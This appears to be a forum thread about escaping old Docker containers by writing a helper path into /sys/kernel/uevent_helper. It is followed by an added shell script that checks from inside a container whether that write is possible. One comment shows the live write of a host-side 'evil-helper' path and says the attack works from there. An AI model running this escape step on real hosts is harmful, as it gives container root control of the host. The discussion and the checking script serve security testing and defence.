
That example is old, but yes it does work, and will continue to work until docker uses user namespaces.

That said, the example is not a good one because of the changes applied these days, e.g. the use of the UID on the host side.



I actually tried it on Docker 1.2.0 with the ubuntu:14.04 image.

/sys is already mounted and it is read-only, and it cannot be mounted manually:

  root@07ba8c752195:/# mkdir sys2
  root@07ba8c752195:/# mount -t sysfs sysfs /sys2
  mount: block device sysfs is write-protected, mounting read-only
  mount: cannot mount block device sysfs read-only


BTW: Just one example of a typical Linux namespace vulnerability: http://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-na...


I tested this with the busybox image, and received a warning that /sys was already mounted, but the attack then proceeded to work as expected.


  kalmi@sylph ~> docker run -t -i busybox:latest
  / # mount -t sysfs sysfs /sys
  mount: permission denied (are you root?)
  / # mkdir sys2
  / # mount -t sysfs sysfs /sys2
  mount: mounting sysfs on /sys2 failed: Permission denied

  kalmi@sylph ~> docker --version
  Docker version 1.2.0, build fa7b24f

  kalmi@sylph ~> uname -r
  Linux sylph 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:42 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux


We don't need to argue about this. I see the same permission-denied issue as you, but that doesn't matter.

The /sys is mounted already and reading/writing to it succeeds:

  / # mount -t sysfs sysfs /sys
  mount: permission denied (are you root?)

  / # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper

  / # cat /sys/kernel/uevent_helper
  /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper
From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but ..
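An added example, not posted by anyone in this thread: a small POSIX sh script that checks, from inside a container, the three conditions the comments above turn on. Whether /sys is mounted read-only (parsed from /proc/self/mounts), whether the kernel will actually accept a write to /sys/kernel/uevent_helper from this process (test -w, which honours both permissions and a read-only mount), and whether /proc/self/uid_map shows a remapped user namespace or the identity map in which container root is host root. The parsing functions take their input as text so they can be run against constructed samples; only report() touches the live kernel files. Function names are my own.

```shell
#!/bin/sh
# Added example: container-side checks for the uevent_helper write discussed
# above. Nothing here writes to /sys; it only reports whether a write would
# be accepted and whether root inside the container is root on the host.

# sys_mount_opts MOUNTS_TEXT: print the mount options of the sysfs mount on
# /sys from text in /proc/self/mounts format (empty if there is none).
sys_mount_opts() {
    printf '%s\n' "$1" | awk '$2 == "/sys" && $3 == "sysfs" { opts = $4 } END { print opts }'
}

# sys_is_readonly MOUNTS_TEXT: succeed if /sys carries the "ro" option.
sys_is_readonly() {
    case ",$(sys_mount_opts "$1")," in
        *,ro,*) return 0 ;;
        *)      return 1 ;;
    esac
}

# userns_remapped UID_MAP_TEXT: succeed if the uid_map is anything other than
# the single identity line "0 0 4294967295" (that identity line is what a
# process sees when no user-namespace remapping is in effect, so uid 0 inside
# the container is uid 0 on the host). Empty input counts as not remapped.
userns_remapped() {
    printf '%s\n' "$1" | awk '
        NF == 0 { next }
        { n++; if ($1 == 0 && $2 == 0 && $3 == 4294967295) ident = 1 }
        END { exit (n == 0 || (n == 1 && ident)) ? 1 : 0 }'
}

# uevent_helper_writable: succeed if this process may write the file.
# test -w uses access(2), which fails with EROFS on a read-only mount, so a
# "ro" /sys is caught here as well as a plain permission problem.
uevent_helper_writable() {
    [ -w /sys/kernel/uevent_helper ]
}

# report: run the live checks and print one verdict line per finding.
report() {
    mounts=$(cat /proc/self/mounts 2>/dev/null)
    if sys_is_readonly "$mounts"; then
        echo "/sys is mounted read-only (opts: $(sys_mount_opts "$mounts"))"
    else
        echo "/sys is not mounted read-only (opts: $(sys_mount_opts "$mounts"))"
    fi
    if uevent_helper_writable; then
        echo "WARNING: /sys/kernel/uevent_helper is writable by this process"
    else
        echo "/sys/kernel/uevent_helper is not writable by this process"
    fi
    if userns_remapped "$(cat /proc/self/uid_map 2>/dev/null)"; then
        echo "uid_map is remapped: container root is not host root"
    else
        echo "uid_map is the identity map: container root is host root"
    fi
}

report
```

Run it as the container's default user inside the image under test (docker run -t -i IMAGE sh /path/to/script). The interesting combination is the one the thread describes: /sys reported read-only at the mount level but /sys/kernel/uevent_helper still writable because the process is root and the mount was not read-only on that kernel/Docker version, together with an identity uid_map.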



